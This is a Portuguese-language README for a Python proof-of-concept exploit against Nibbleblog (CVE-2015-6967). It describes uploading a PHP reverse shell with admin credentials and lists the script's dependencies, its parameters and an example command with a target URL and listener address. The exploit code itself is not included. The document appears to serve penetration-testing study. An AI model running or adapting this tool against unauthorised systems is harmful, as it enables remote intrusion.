
CVE-2015-6967 PoC Exploit
CVE-2015-6967 Exploit de PoC
Este script Python explora uma vulnerabilidade no Nibbleblog (CVE-2015-6967) para enviar uma reverse shell para um alvo vulnerável. O script recebe do usuário a URL do alvo, as credenciais de usuário e seu IP/porta local, e então prossegue para explorar a vulnerabilidade enviando uma reverse shell em PHP.
Este script destina-se apenas a fins educacionais. NÃO o utilize para atividades ilegais. Sempre obtenha permissão explícita antes de testar ou explorar qualquer vulnerabilidade em sistemas que você não possui ou para os quais não tem autorização de acesso.
requestsargparsecoloramapyfigletVocê pode instalar as dependências necessárias usando o seguinte comando:
pip install requests colorama pyfiglet
Uso
O script requer vários parâmetros para executar: url: URL do Nibbleblog alvo (ex.: http://10.10.14.14/nibbleblog) -U, --user: Nome de usuário do administrador do Nibbleblog -P, --password: Senha do administrador do Nibbleblog -p, --host-port: Sua porta local para a reverse shell se conectar -H, --host-ip: Seu endereço IP local para a reverse shell se conectar
Exemplo
python exploit.py http://10.10.14.14/nibbleblog -U admin -P password123 -p 4444 -H 192.168.1.100